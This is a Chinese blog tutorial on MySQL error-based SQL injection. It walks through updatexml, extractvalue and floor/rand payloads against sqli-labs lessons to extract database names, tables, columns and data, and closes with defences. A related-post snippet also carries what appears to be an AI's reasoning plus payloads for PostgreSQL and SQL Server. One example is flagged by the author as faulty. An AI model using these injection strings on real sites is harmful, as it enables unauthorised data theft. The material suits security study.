报错注入详解

已于 2025-04-25 23:28:23 修改
阅读量1.3k 收藏 32
点赞数 49
分类专栏: 漏洞学习 文章标签: sql 数据库
于 2025-03-11 22:35:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_88816569/article/details/146190798
版权

1. 报错注入

Error-Based SQL lnjection

1.1. 报错注入基本原理

  1. 一种通过故意触发数据库错误,从错误信息中提取敏感数据的攻击方式。
  2. 原理:利用数据库函数的错误错误处理机制,将查询结果直接显示在错误信息中。

1.2. xpath

XML(XML Path Language)

是一种用于在xml文档中定位节点的查询语言。

如果把XML文档比作一个树形结构的文件(文件夹目录),xpath就是用来导航到树中某个具体位置的路径表达式

1.2.1. XPath与SQL注入

在我们所学的报错注入攻击中,攻击者通过构造非法的XPATH表达式,触发数据库错误,然后从中提取数据

故意插入非法字符(如~)非xpath语法内容(数据库查询结果),MySQL会抛出错误。

1.3. 核心步骤

MySQL的版本需要>5.1.5

  • 我们目前只是针对MySQL数据库进行操作

1.3.1. 确认注入点

  1. 测试是否存在注入点,输入单引号',观察是否返回数据库错误。

?id=1'

2. 像返回图中 You have an error in your SQL syntax...的提示,说明可能存在注入漏洞。

1.3.2. 触发错误并提取数据

我们使用的是MySQL常用函数:updatexml(),extractvalue(),floor()

利用xpath语法错误。

1.3.2.1. 获取数据库版本

?id=1' and updatexml(1,concat('~',version()),1)

  • updatexml(1, xpath表达式, 1):用于XML文档修改,但第二个参数需为合法XPath。
  • concat(0x7e, version()):0x7e是~的十六进制,用于分隔错误信息。
  • 执行时,因 version()的结果拼接到非法XPath中,触发错误,错误信息会包含数据库版本。

1.3.3.  extractvalue函数

正确语法:extractvalue(xml_document,Xpath_string);

  1. xml_document:是string格式,是xml文件对象的名称。
  2. Xpath_string :是xpath格式的字符串。
  3. 作用:从目标xml中返回包含所查询值的字符串。
  4. 注:第二个参数是要求符合xpath语法,如果不符合就会报错并且将查询结果放在报错信息里因此可以利用。

1.3.3.1. extractvalue函数使用方式:

 ?id =1 and (select extractvalue("anything",concat('~',(select 查询语句))))

数字型列子:?id=1 and (select extractvalue("anyting",concat('~',(select user()))))

 

字符型:?id=1' and (select extractvalue("anything",concat('~',(select user()))))--+

注:字符型与数字型只相差了‘

1.3.3.2. 数据库中函数使用方法

查数据库名:id='and(select extractvalue(1,concat(0x7e,(select database()))))

数字型less-2

?id=1 and(select extractvalue(1,concat(0x7e,(select database()))))

爆表名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

爆字段名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))

爆数据:id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

细节解释:

① 0x7e=’~’

② concat(‘a’,‘b’)=“ab”

③ version()=@@version

④ ‘~‘可以换成’#’、’$'等不满足 xpath 格式的字符

(????)⑤ extractvalue()能查询字符串的最大长度为 32,如果我们想要的结果超过 32,就要 用 substring()函数截取或 limit 分页,一次查看最多 32 位

1.3.4. updatexml 函数

正常语法:updatexml(xml_document,xpath_string,new_value)

与extractvalue函数一样

第一个参数:xml文档名称

第二个参数:符合xpath函数的字符串,须符合xpath语法。

第三个参数:new_value 是 string 格式,替换查找到的负荷条件的数据

作用:改变文 档中符合条件的节点的值

作用:改变文档中符合条件的节点的值 updatexml 使用时,当 xpath_string 格式出现错误,mysql 则会爆出 xpath 语法错误。

1.3.4.1. updatexml 函数注入利用方式

 id=1 and updatexml("anything",concat('~',(select 语句)),"anything")

数字型列子:less-2 查用户名

第二个参数就是用来替换各种SQL语句的

id=1 and updatexml("anything",concat('~',(select user())),"anything")

字符型:less-1,字符型记得注释后面参数--+

id=1' and updatexml("anything",concat('~',(select user())),"anything")--+

1.3.4.2. 数据库中函数使用

 Mysql 数据库为例:

爆数据库名:'and(select updatexml(1,concat(0x7e,(select database())),0x7e))

使用的是?id=1 and (select updatexml(1,concat(0x7e,(select database(),0x7e)))) less-2

爆表名:'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))

爆列名:'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))

爆数据:'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

1.3.5. floor()函数

  1. floor()是SQL中的数学函数,正确用途是将数值向下取整到最接近的整数。其语法如下:
  • 示例
    • FLOOR(3.7) 返回 3
    • FLOOR(-2.3) 返回 -3(向下取整,负数会更小)

1.3.5.1. 报错注入中的利用原理

在 SQL 注入攻击中,FLOOR() 常与 RAND()、GROUP BY 结合使用,通过触发主键重复错误泄露数据。核心原理

  1. rand() 生成随机数(范围 0~1)。
  2. floor(rand()*2) 会随机返回 0 或 1。
  3. 当 GROUP BY 子句使用 FLOOR(RAND()*2) 时,由于随机性,可能出现临时表主键冲突,导致数据库抛出错误。
  4. GROUP BY 的工作原理当使用 GROUP BY 对某列分组时,数据库会:
    • 创建一个临时表,将分组列的值作为临时表的主键
    • 遍历原始数据,将每行数据插入对应的分组(即临时表的主键对应的行)。
    • 如果插入时发现主键已存在,则触发主键冲突错误

1.3.5.1.1. 创建临时表并插入数据

  • 临时表结构:主键为 x。
  • 插入过程
    1. 插入 x=0 → 成功。
    2. 插入 x=1 → 成功。
    3. 插入 x=1 → 主键冲突,触发错误。
  1. group by对字母进行排列,从A到a排序,当有相同时的名字时它会合并
  2. 错误信息中会包含触发冲突的值,攻击者可利用此泄露敏感数据。

1.3.5.2.  floor函数注入方式

示例 1:数字型

?id=1 union select 1 from (select count(*),concat((select user())," ",floor(rand(0)*2))x from information_schema.tables group by x)a

 有问题 示例 2:字符型

?id=1' union select 1 from (select count(*),concat((select user())," ",floor(rand(0)*2))x from information_schema.tables group by x)a--+

1.3.5.3. 其他指令

Mysql 数据库为例:

爆数据库名:'union select 1 from (select count(*),concat((select database())," ",floor(rand(0)*2))x from information_schema.tables group by x)a

爆表名:'union select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1) ," ",floor(rand(0)*2))x from information_schema.tables group by x)a

爆列名:'union select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name="TABLE_NAME" limit 0,1) ," ",floor(rand(0)*2))x from information_schema.tables group by x)a

爆数据:'union select 1 from (select count(*),concat((select COLUMN_NAME from TABLE_NAME limit 0,1) ," ",floor(rand(0)*2))x from information_schema.tables group by x)a

现代的 web 中对输入的内容会做很严格的限制,并且在默认情况下都是不会显示错误信息,因此前面学习的联合查询和报错注入都无法利用来注入了,因此我们需要使 用"盲注"来进行 SQL 注入,所谓的盲注就是在服务器没有错误信息会显示完成注入攻 击,但是服务器不会显示错误信息,我们就需要找到一个方法来验证 SQL 语句是否被执行

1.3.5.4  防御措施总结

  1. 参数化查询:禁止直接拼接 SQL 语句。

  2. 过滤输入:对特殊字符('"RAND)进行转义。

  3. 错误信息隐藏:生产环境返回通用错误页面。

  4. 权限控制:禁止应用账号访问 information_schema

总结

  • 主键冲突触发条件GROUP BY 动态生成的分组键出现重复。

  • 攻击本质:通过固定随机种子,控制分组键的生成序列,使错误信息反映敏感数据。

  • 防御关键:避免 SQL 拼接 + 最小化数据库权限。

68.网络安全渗透测试—[SQL注入篇7]—[MySQL+PHP-报错注入详解&示例]
qwsn
01-17 2991
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、MySQL+PHP 报错注入 1、MySQL报错信息: 2、爆库的简单方法: 3、常用报错语句1: 4、常用报错语句2: 5、报错注入总结:
SQL注入报错注入
帅醉了的博客
03-03 1283
0x00_报错注入原理 构造报错payload让信息通过报错信息回显出来。在查询不回现内容,会答应错误信息。Update、insert等语句,会打印错误信息。 0x01_报错注入操作 floor()报错注入 mysql模板: concat:连接字符串功能 floor:去整数值 rand:取0~1之间的随机浮点值 group by:根据一个或多个列对结果集进行分组并有排序功能 select coun...
Sql注入-报错注入
WolvenSec的博客
06-06 1951
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
报错注入常用的三种注入方式(flool ,extractvalue、updatexml)
最新发布
lza20001103的博客
04-17 975
报错注入常用的三种注入方式(flool ,extractvalue、updatexml)
SQL注入-报错注入
热门推荐
LJH1999ZN的博客
02-09 1万+
sql注入报错注入的演示与介绍
Mysql报错注入详解.docx
11-20
MySQL 报错注入是一种安全漏洞利用技术,当应用程序在处理用户输入时未能充分过滤或转义SQL语句,导致数据库因错误语法而返回错误信息,攻击者可以通过分析这些错误信息来获取敏感信息或执行恶意操作。以下是对MySQL...
GET报错注入详解:单双引号利用与Sqlmap应用
本资源主要讲解了Web应用中的GET报错注入技术,这是一个常见的SQL注入类型,特别是在处理用户输入并可能导致错误消息泄露的情况下。这部分内容分为两部分:报错注入介绍和两种具体的GET报错注入实例。 **1. 报错...
Web攻防训练营:GET报错注入详解
"第六节 GET报错注入-01" 在Web安全领域,GET报错注入是一种常见的SQL注入攻击方式,通常发生在使用GET方法传递参数到后台数据库查询时。这种攻击利用了应用程序对错误处理不当的漏洞,使得攻击者可以通过构造特定...
sql注入——报错注入
m0_73756016的博客
10-18 3455
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
SQL注入---报错注入
zhoutong2323的博客
04-04 1442
SQL注入报错攻击中,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析:上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
报错注入
Web安全工具库
09-27 323
不是我不想,你上学我上班,我耽误你前程似锦,你耽误我成家立业,我的眼里都是烟花和生活,你的眼里都是未来和希望。。。 ---- 网易云热评 一、相关函数 1、rand():产生一个0-1之间随机数,rand(0),随机产生一个0-1的随机数,运行多次产生的结果一样 2、floor():向下取整,floor(rand()*2),随机产生0和1两个数 3、groupby:分组排列 4、count(*):统计数量 5、concat():将字符串连接起来 二、通过floor(...
报错注入payload
03-14
<think>好的,我现在需要帮助用户查找关于报错注入(error-based SQL injection)的payload示例和解释。用户提到他们可能是在学习安全测试或了解漏洞利用方法。首先,我得回顾自己掌握的SQL注入知识,特别是报错注入的部分。 报错注入是一种利用数据库错误信息来提取数据的方法。当应用程序没有正确过滤用户输入,并且将错误信息直接返回给用户时,攻击者可以构造特定的查询,触发数据库错误,从而通过这些错误信息获取数据库结构或数据。 接下来,我需要确认用户需要的具体内容:payload示例和解释。因此,我应该先列举常见的报错注入技术,并给出对应的payload例子,然后逐一解释其原理。同时,需要注意引用相关的资料,比如用户提供的引用[3]提到了一些攻击技术,但可能更相关的可能是引用[2]中关于PostgreSQL的安全措施,不过用户的问题更偏向于攻击方法,所以可能需要结合一般性的知识。 常见的数据库如MySQL、PostgreSQLSQL Server在报错注入上有不同的函数和利用方式。例如,MySQL中的updatexml()、extractvalue(),以及利用group by子句的重复列错误;而PostgreSQL可能使用cast函数结合类型转换错误。SQL Server则可能利用convert函数或其它方式。 需要确保给出的示例准确,并且语法正确。同时,提醒用户这些方法仅用于教育目的,强调合法授权测试的重要性,符合引用[2]中提到的安全思维模式。 然后,考虑用户可能的后续问题,比如如何防御这类攻击,或者不同数据库之间的差异。因此,在相关问题部分,可以提出防御措施、不同数据库报错注入差异,以及工具使用的问题。 现在整理思路,分步骤说明报错注入的原理,给出不同数据库的payload示例,并解释每个部分的作用。同时,引用用户提供的资料中的相关内容,比如引用[3]提到的攻击技术,如利用错误信息获取访问权限,但具体到报错注入,可能需要更具体的例子。 最后,确保回答结构清晰,使用中文,并正确应用LaTeX格式,行内公式用$...$,独立公式用$$...$$。同时,生成的相关问题需要与主题紧密相关,帮助用户进一步学习。</think>### 报错注入(Error-Based SQL Injection)Payload示例与原理 报错注入是一种通过触发数据库错误信息来提取数据的攻击技术,常用于**未正确过滤输入且显示错误详情**的Web应用[^3]。以下是常见数据库的payload示例与解析: --- #### 1. **MySQL 报错注入** 利用函数如 `updatexml()` 或 `extractvalue()` 构造XPath语法错误: ```sql ' AND updatexml(1, concat(0x7e, (SELECT user())), 1) -- ``` - **解析**: - `updatexml()` 用于XML解析,第二个参数应为合法XPath表达式。 - `concat(0x7e, (SELECT user()))` 拼接波浪符(`~`)和当前用户信息,导致XPath格式错误。 - 错误信息会包含`~root@localhost`等敏感数据[^2]。 **数学表达示例**: 若数据库版本查询的payload为: $$ \text{payload} = \text{' AND updatexml(1, concat(0x7e, version()), 1) -- } $$ 则错误输出可能包含版本号,如`XPATH syntax error: '~8.0.32'`。 --- #### 2. **PostgreSQL 报错注入** 利用类型转换错误或未定义函数: ```sql ' AND 1=cast((SELECT current_user) as int) -- ``` - **解析**: - `cast((SELECT current_user) as int)` 尝试将用户名(字符串)转换为整数,触发类型错误。 - 错误信息如 `invalid input syntax for integer: "postgres"` 会泄露当前用户。 --- #### 3. **SQL Server 报错注入** 使用`convert()`函数触发类型转换错误: ```sql ' AND 1=convert(int, (SELECT @@version)) -- ``` - **解析**: - `convert(int, ...)` 强制转换数据库版本信息(字符串)为整数,导致错误。 - 错误信息会包含完整的版本字符串。 --- ### 防御建议 1. **输入过滤与参数化查询**:使用预编译语句(Prepared Statements)避免SQL拼接。 2. **错误信息隐藏**:禁止向用户返回原始数据库错误详情。 3. **权限最小化**:限制数据库账户权限,避免使用高权限账户连接应用[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

談不譚網安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值